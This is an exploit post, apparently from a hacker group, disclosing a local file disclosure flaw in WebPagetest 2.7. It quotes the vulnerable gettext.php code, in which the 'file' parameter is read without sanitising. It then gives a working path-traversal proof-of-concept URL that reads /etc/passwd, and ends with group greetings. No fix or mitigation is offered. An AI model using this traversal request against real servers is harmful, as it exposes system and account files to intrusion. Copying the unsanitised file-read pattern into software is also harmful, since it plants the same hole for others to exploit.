[+] Author: TUNISIAN CYBER
[+] Exploit Title: WebPagetest 2.7 LFD Vulnerability
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor: http://code.google.com/p/webpagetest/downloads/detail?name=webpagetest_2.7.zip&can=2&q=
[+] Google Dork: n/a
[+] Tested on: KaliLinux/Debian 3.7.2
[+] Friend's blog: http://na3il.com/
   
########################################################################################
v2.6 Discovered by dun (http://1337day.com/exploit/18980)

+Description:

WebPagetest is an open source project that is primarily being developed and supported by Google 
as part of our efforts to make the web faster.

+Exploit:
WebPagetestfrom a LFD Vulnerablitiy:

1/LFD:

File: gettext.php
Parameter: file

[PHP]
<?php
include('common.inc');
$ok = false;

if( isset($_GET['file']) && strlen($_GET['file']) )
{
    $data = gz_file_get_contents("$testPath/{$_GET['file']}");
    if( $data !== false )
    {
        $ok = true;
        echo $data;
    }
}

if( !$ok )
    header("HTTP/1.0 404 Not Found");  
?>
[PHP]

P.O.C
127.0.0.1/webP/www/gettext.php?file=../../../../../../../../../../../etc/passwd
LocalTest: http://i.imgur.com/9MFuGDf.png


########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################